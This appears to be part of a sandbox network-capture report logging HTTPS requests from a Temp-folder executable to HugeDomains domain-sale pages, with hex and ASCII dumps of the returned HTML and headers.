2023-12-22 20:14:54 UTC	533	IN	Data Raw: 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 2f 2a 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 29 3b 20 2a 2f 0d 0a 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 2c 20 7b 0d 0a 27 63 75 73 74 6f 6d 5f 6d 61 70 27 3a 20 7b 0d 0a 27 64 69 6d 65 6e 73 69 6f 6e 33 27 3a 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 0d 0a 7d 0d 0a 7d 29 3b 0d 0a 67 74 61 67 28 27 65 76 65 6e 74 27 2c 20 27 70 61 67 65 4c 6f 61 64 27 2c 20 7b 20 27 Data Ascii: r = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());/* gtag('config', 'UA-7117339-4'); */gtag('config', 'UA-7117339-4', {'custom_map': {'dimension3': 'siteversion'}});gtag('event', 'pageLoad', { '
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 31 37 31 36 0d 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 42 75 72 67 65 72 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 6e 61 76 54 6f 67 67 6c 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4e 61 76 69 67 61 74 69 6f 6e 20 54 6f 67 67 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 63 66 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 68 64 2d 68 65 61 64 65 72 2d 6c 6f 67 6f 2d 76 33 2e 73 76 67 22 20 61 6c 74 3d 22 6c 6f 67 6f 22 20 63 6c 61 73 73 3d Data Ascii: 1716<div class="navBurger" role="button" id="navToggle" aria-label="Navigation Toggle"></div><a class="logo" href="https://www.HugeDomains.com/index.cfm"><img src="https://static.HugeDomains.com/images/hdv3-img/hd-header-logo-v3.svg" alt="logo" class=
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 3b 22 20 73 74 79 6c 65 3d 22 20 68 65 69 67 68 74 3a 33 35 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 39 30 70 78 3b 20 77 69 64 74 68 3a 39 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 20 63 69 72 63 75 6c 61 72 42 6c 61 63 6b 4a 20 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 Data Ascii: ;" style=" height:35px; min-width:90px; width:90px; padding-left:0px; padding-right:0px; padding-bottom:0px; padding-top:0px; margin-bottom:0px; overflow:hidden;"><div class="circularJ circularBlackJ " style="margin-left:0px; margin-right:0px; margin-top
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 6f 6e 74 61 63 74 2e 63 66 6d 22 3e 43 6f 6e 74 61 63 74 20 75 73 3c 2f 62 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 6c 6f 67 69 6e 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 3e 4d 79 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 68 6f 70 2d 6c 69 6e 6b 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 69 63 6f 6e 20 66 61 76 6f 72 69 74 2d 69 63 6f 20 22 20 73 74 Data Ascii: tps://www.HugeDomains.com/contact.cfm">Contact us</b></a></li><li class="nav-item"><a href="https://www.HugeDomains.com/payment-plan-login.cfm" class="nav-link ">My account</a></li></ul><div class="shop-links"><div class="cart-icon favorit-ico " st
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 67 72 65 65 6e 22 3e 24 34 2c 34 39 35 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 59 75 65 6a 69 43 68 65 6d 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 62 2d 30 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 50 72 6f 63 65 49 44 27 29 2e 72 65 6d Data Ascii: green">$4,495</span></span><a href="https://www.HugeDomains.com/shopping_cart.cfm?d=YuejiChem&e=com" class="btn m-b-0 m-t-0 " id="hdv3Billboard197BuyID" onClick="$('#hdv3Billboard197BuyID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyProceID').rem
2023-12-22 20:14:54 UTC	442	IN	Data Raw: 37 50 50 50 72 6f 63 65 49 44 22 20 63 6c 61 73 73 3d 22 20 70 6c 61 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 Data Ascii: 7PPProceID" class=" place-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div c
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 32 33 34 66 0d 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 38 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 73 62 6c 6f 63 6b 2d 66 6f 6f 74 65 72 22 3e 4f 6e 6c 79 20 24 31 38 37 2e 32 39 2f 6d 6f 2e 20 66 6f 72 20 32 34 20 6d 6f 6e 74 68 73 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 59 75 65 6a 69 43 68 65 6d 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 64 69 66 2d 6c 22 3e 53 65 65 20 Data Ascii: 234f<div class="circularJ_7"></div><div class="circularJ_8"></div></div></button><span class="ssblock-footer">Only $187.29/mo. for 24 months</span><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=YuejiChem.com" class="link dif-l">See
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 34 41 32 44 32 49 44 27 29 2e 73 75 62 6d 69 74 28 29 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 22 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 62 75 79 2d 6e 6f 77 20 73 69 6e 67 6c 65 2d 70 72 6f 64 75 63 74 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 2d 6e 65 77 2d 70 72 6f 64 75 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 6e 67 6c 65 2d 70 72 6f 64 75 63 74 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6e 2d 62 6c 6f 63 6b 22 3e 0a 3c 68 31 20 69 64 3d 22 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 2d 6e 61 6d 65 22 3e 59 75 65 6a 69 43 68 65 6d 2e Data Ascii: 4A2D2ID').submit();}</script><div class="content-wrapp"><section class="buy-now single-product top-container-new-product"><div class="container"><div class="single-product-block"><div class="bn-block"><h1 id="main" class="domain-name">YuejiChem.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	58857	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	319	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip Cookie: site_version_phase=108; site_version=HDv3 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.hugedomains.com/domain_profile.cfm?d=vixej.com
2023-12-22 20:14:54 UTC	639	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wt6V%2F2MRYbbp69R3vJmxFJ02gi1DFT9K9qDqiIXjP1iaQSWdOCrICuW0XoW8F7Rma%2BEsofxWds%2Fbvsqsd1q99ILG8y%2BqoN%2FVLWZjUMOdY1rGAL7pAY8nU7YzZ6cNaxzOM7UYgmM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08a6693c02e8-MIA
2023-12-22 20:14:54 UTC	730	IN	Data Raw: 37 64 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7d23<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 68 64 2d 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 32 2d 31 30 2d 33 33 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 Data Ascii: dv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/responsive.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/hd-style.css?aa=2022-10-33"><meta name="t
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 2f 2a 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 29 3b 20 2a 2f 0d 0a 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 2c 20 7b 0d 0a 27 63 75 73 74 6f 6d 5f 6d 61 70 27 3a 20 7b 0d 0a 27 64 69 6d 65 6e 73 69 6f 6e 33 27 3a 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 0d 0a 7d 0d 0a 7d 29 3b 0d 0a 67 74 61 67 28 27 65 76 65 6e 74 27 Data Ascii: window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());/* gtag('config', 'UA-7117339-4'); */gtag('config', 'UA-7117339-4', {'custom_map': {'dimension3': 'siteversion'}});gtag('event'
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 61 64 65 72 46 6f 72 6d 53 65 61 72 63 68 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 64 6f 6d 61 69 6e 5f 6e 61 6d 65 22 20 76 61 6c 75 65 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 69 6e 70 75 74 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 54 65 78 74 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 48 65 61 64 65 72 20 44 6f 6d 61 69 6e 20 53 65 61 72 63 68 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 Data Ascii: tion="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHeaderFormSearchID"><input type="text" name="domain_name" value class="search-input" id="hdv3HeaderSearchTextID" aria-label="Header Domain Search"><button type
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 4d 65 6e 75 20 64 2d 66 6c 65 78 20 61 69 2d 63 65 6e 74 65 72 20 6a 63 2d 62 65 74 77 65 65 6e 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 6e 61 76 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 Data Ascii: 91Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="overlay "><div class="overlayMenu d-flex ai-center jc-between"><ul class="navbar-nav"><li class="nav-item"><a class="nav-link " href="https://www.HugeDomai
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 6e 75 6d 62 65 72 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 69 64 3d 22 68 64 76 33 43 61 72 74 4e 75 6d 62 65 72 53 70 61 6e 49 44 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 61 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6d 61 69 6e 20 22 3e 0a 0a 0a 3c 64 69 Data Ascii: obile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.png" alt><span class="cart-number hiddenAtLoad" id="hdv3CartNumberSpanID"></span></a></div></div></div></div></nav></header><main class="site-main "><di
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 38 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6f 72 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 56 69 78 65 6a 2e 63 6f 6d 22 20 Data Ascii: "></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7"></div><div class="circularJ_8"></div></div></button><span class="or">or</span><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=Vixej.com"
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 72 6f 6b 65 74 2d 73 69 64 65 2d 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 54 61 6b 65 20 69 6d 6d 65 64 69 61 74 65 20 6f 77 6e 65 72 73 68 Data Ascii: png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/roket-side-ico.png" alt></div><div class="content"><span>Take immediate ownersh
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 30 38 2e 31 33 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 68 20 66 6f 72 20 32 34 20 6d 6f 6e 74 68 73 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 6c 65 66 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 56 69 78 65 6a 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d Data Ascii: Buy now for <span class="green">$4,995</span> or pay <span class="green">$208.13</span> per month for 24 months</p><div class="tablet-block-row"><div class="tablet-block-left"><a href="https://www.HugeDomains.com/shopping_cart.cfm?d=Vixej&e=com" class=
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 69 78 65 6a 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 50 50 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 50 50 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 50 50 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e Data Ascii: ixej.com" class="btn" style="padding-right:30px; width:247px; min-width:247px; margin-top:10px; " id="hdv3Billboard197BuyTabPPID" onClick="$('#hdv3Billboard197BuyTabPPID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyTabPPProceID').removeClass('hidden

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	58856	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	335	OUT	GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip Cookie: site_version_phase=108; site_version=HDv3 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.hugedomains.com/domain_profile.cfm?d=keywordranker.com
2023-12-22 20:14:54 UTC	639	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ek50cm%2FR7fD5Xvm3GMq%2FrFDfd6pge4r5pSEODDf2LWRsZxHUwxw%2BizsEzvYXMvo5bWdI3exYlG3F5ivg7fkpm2ssGC09E%2BjJWH0cewL0bS07NIgWWr65P3U7fXtRDZo5kpiaL%2FY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08a68d0e8dcc-MIA
